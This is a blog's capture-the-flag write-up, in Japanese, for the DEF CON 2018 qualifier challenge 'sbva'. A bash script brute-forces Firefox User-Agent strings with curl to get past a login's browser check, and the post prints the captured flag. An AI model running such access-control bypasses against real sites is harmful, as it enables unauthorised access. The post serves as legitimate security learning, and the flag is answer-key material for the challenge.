こんとろーるしーこんとろーるぶい

週末にカチャカチャッターン!したことを貼り付けていくブログ

DEF CON CTF Qualifier 2018 - sbva

問題文

We offer extensive website protection that stops attackers even when the admin's credentials are leaked!
Try our demo page http://0da57cd5.quals2018.oooverflow.io with username:password admin@oooverflow.io:admin to see for yourself.

f:id:graneed:20180513154645p:plain

writeup

ログイン画面でadmin@oooverflow.io:adminを入力してログインすると、

Incompatible browser detected.

の表示。
http://0da57cd5.quals2018.oooverflow.io/wrongbrowser.phpへリダイレクトさせられる。

他に何が起きているか確認するため、curlで見てみる。

ctfuser@kali:sbva$ curl http://0da57cd5.quals2018.oooverflow.io/login.php -d "username=admin@oooverflow.io&password=admin" -v
*   Trying 13.56.115.190...
* TCP_NODELAY set
* Connected to 0da57cd5.quals2018.oooverflow.io (13.56.115.190) port 80 (#0)
> POST /login.php HTTP/1.1
> Host: 0da57cd5.quals2018.oooverflow.io
> User-Agent: curl/7.57.0
> Accept: */*
> Content-Length: 43
> Content-Type: application/x-www-form-urlencoded
> 
* upload completely sent off: 43 out of 43 bytes
< HTTP/1.1 302 Found
< Server: nginx/1.10.3 (Ubuntu)
< Date: Sat, 12 May 2018 11:11:52 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< Connection: keep-alive
< Set-Cookie: PHPSESSID=luj4oovknmmia6boqqbd7bkde3; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Content-Security-Policy: upgrade-insecure-requests
< Location: wrongbrowser.php
< 

<html>
    <style scoped>
        h1 {color:red;}
        p {color:blue;} 
    </style>
    <video id="v" autoplay> </video>
    <script>
        if (navigator.battery.charging) {
            console.log("Device is charging.")
        }
    </script>
* Connection #0 to host 0da57cd5.quals2018.oooverflow.io left intact
</html>

HTTPレスポンスヘッダーのLocationヘッダーにwrongbrowser.phpがセットされているため、 画面表示されずにwrongbrowser.phpへリダイレクトされるのだが、HTTPレスポンスボディにコンテンツがあった。
これは怪しい。また、コンテンツにはあまり目にしないタグとプロパティがあることに気づく。

これらの機能を使用できるブラウザのUserAgentをHTTPリクエストヘッダーにセットすればいいのだろうか。
Gecko ユーザエージェント文字列リファレンス - HTTP | MDN より、FirefoxのUserAgent仕様を確認する。
UserAgentのバージョン番号を21から50の間で変化させて総当たりする。

ctfuser@kali:sbva$ cat try_FF.sh 
#!/bin/bash
for VER in `seq 21 50`
do
UA="Mozilla/5.0 (Windows NT 6.1; rv:$VER.0) Gecko/20100101 Firefox/$VER.0"
echo $UA
curl http://0da57cd5.quals2018.oooverflow.io/login.php -d "username=admin@oooverflow.io&password=admin" -v -H "User-Agent: $UA" 2>&1 | grep wrongbrowser.php
done
ctfuser@kali:sbva$ ./try_FF.sh 
Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20100101 Firefox/23.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/25.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:27.0) Gecko/20100101 Firefox/27.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:28.0) Gecko/20100101 Firefox/28.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:37.0) Gecko/20100101 Firefox/37.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0
Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:44.0) Gecko/20100101 Firefox/44.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:46.0) Gecko/20100101 Firefox/46.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:48.0) Gecko/20100101 Firefox/48.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:49.0) Gecko/20100101 Firefox/49.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:50.0) Gecko/20100101 Firefox/50.0
< Location: wrongbrowser.php

Firefox/42だけ、Location: wrongbrowser.phpが返ってこない。
curlで単独実行してみると、フラグが返ってきていた。

ctfuser@kali:sbva$ curl http://0da57cd5.quals2018.oooverflow.io/login.php -d "username=admin@oooverflow.io&password=admin" -v -H "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0"
*   Trying 13.56.115.190...
* TCP_NODELAY set
* Connected to 0da57cd5.quals2018.oooverflow.io (13.56.115.190) port 80 (#0)
> POST /login.php HTTP/1.1
> Host: 0da57cd5.quals2018.oooverflow.io
> Accept: */*
> User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0
> Content-Length: 43
> Content-Type: application/x-www-form-urlencoded
> 
* upload completely sent off: 43 out of 43 bytes
< HTTP/1.1 200 OK
< Server: nginx/1.10.3 (Ubuntu)
< Date: Sun, 13 May 2018 06:12:36 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< Connection: keep-alive
< Set-Cookie: PHPSESSID=2kocc3ljm9njjsoediqasm6af6; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT[f:id:graneed:20180513154645p:plain]
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Content-Security-Policy: upgrade-insecure-requests
< 
OOO{0ld@dm1nbr0wser1sth30nlyw@y}
<html>
    <style scoped>
        h1 {color:red;}
        p {color:blue;} 
    </style>
    <video id="v" autoplay> </video>
    <script>
        if (navigator.battery.charging) {
            console.log("Device is charging.")
        }
    </script>
* Connection #0 to host 0da57cd5.quals2018.oooverflow.io left intact
</html>